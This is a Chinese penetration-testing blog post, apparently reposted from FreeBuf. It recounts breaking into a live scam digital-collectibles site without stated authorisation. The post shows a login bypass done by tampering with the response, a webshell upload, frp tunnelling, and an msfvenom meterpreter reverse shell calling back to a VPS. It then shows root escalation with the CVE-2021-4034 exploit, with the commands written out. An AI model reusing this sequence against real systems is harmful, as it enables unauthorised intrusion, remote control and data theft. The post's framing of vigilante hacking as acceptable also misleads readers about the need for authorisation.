实战 | 杀猪盘渗透测试
2022-10-6 12:34:55 Author: 白帽子左一(查看原文) 阅读量:43 收藏

扫码领资料

获黑客教程

免费&进群

hh作者:
这是一个主打数字藏品的网站元宇宙妥妥的割韭菜,关于这个网站也是无意间找到的。

看起来非常假的网站这个网站是没有cdn的用的是thinkphpk框架搭建的。

先打一波poc没有效果,

访问一下后台直接在url后面加/admin。

一个开源的cms还没有验证码尝试用burp进行爆破,首先在火狐上设置代理ip为127.0.0.1代理端口为8081。

Burp上也要设置端口为8081,将Intercept设置为on输入账号密码点击登录就能拦截到数据包。

在爆破之前先发送到Repeater模块发送看看反应。

用户不存在返回code为1的响应码,尝试拦截返回包把1改为0。

成功登录后台,这应该是个前端js验证非常的不安全。

尝试找上传点,点击用户管理-编辑-上传头像,上传一张jpg文件在用burp抓包改为php将内容改为冰蝎马。
成功上传链接冰蝎马。

想办法上线到msf提权,这里就使用frp内网穿透,在我的vps开启frp。
./frps -c frps.ini

在内网上的kali进行设置
设置配置文件将8000端口的流量转到kali的6666端口。
启动客户端
./frpc -c frpc.ini

生成msf木马ip和端口要填vps的
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=****  LPORT=8000  -f elf > shell.elf
这里的lhost 应为服务器地址 LPORT 为反向代理端口,将shell.elf上传到/www/wwwroot/目录设置权限为777。

打开msf进行监听
use exploit/multi/handlerset payload linux/x64/meterpreter/reverse_tcpset lhost 127.0.0.1set lport 6666exploit
运行shell.elf
./shell.elf

成功返回会话。

使用模块run post/multi/recon/local_exploit_suggester进行漏洞查询。

使用cve-2021-4034提权,切换到linux shell下面然后进到/tmp目录下下载脚本。
git clone https://github.com/berdav/CVE-2021-4034.git

似乎不行卡住了直接上传上去吧。
upload /home/kali/Desktop/CVE-2021-4034  /tmp/进入shellcd /tmpmakechmod 777 cve-2021-4034./cve-2021-4034
返回root权限。

查看database.php文件链接数据库发现基本上也没有人充值,看到一个账号40w的就是这家所谓数字藏品公司的老总。

登进入尝试提现均提示账户金额异常看来是跑路了,加了它们的官方群进入一看全是讨钱的
在这里提醒一下各位这种所谓的数字藏品都是骗局根本提不出来钱的。

作者:一点我爱你110, 转载自FreeBuf.COM

声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权

@
学习更多渗透技能!体验靶场实战练习
hack视频资料及工具

(部分展示)

往期推荐

给第一次做渗透项目的新手总结的一些感悟

「登陆页面」常见的几种渗透思路与总结!

突破口!入职安服后的经验之谈

红队渗透下的入口权限快速获取

攻防演练|红队手段之将蓝队逼到关站!

CNVD 之5000w通用产品的收集(fofa)

自动化挖掘cnvd证书脚本

Xray捡洞中的高频漏洞

实战|通过供应链一举拿下目标后台权限

实战|一次真实的域渗透拿下域控(内网渗透)

看到这里了,点个“赞”、“再看”


文章来源: http://mp.weixin.qq.com/s?__biz=MzI4NTcxMjQ1MA==&mid=2247580941&idx=1&sn=146fec2637ac82208bcd8cb9c14b182b&chksm=ebebf420dc9c7d3665891e9f0b45ec2a685917f8ae4241ec30fe53090d6824ec6698f3c6bc4f#rd
如有侵权请联系:admin#unsafe.sh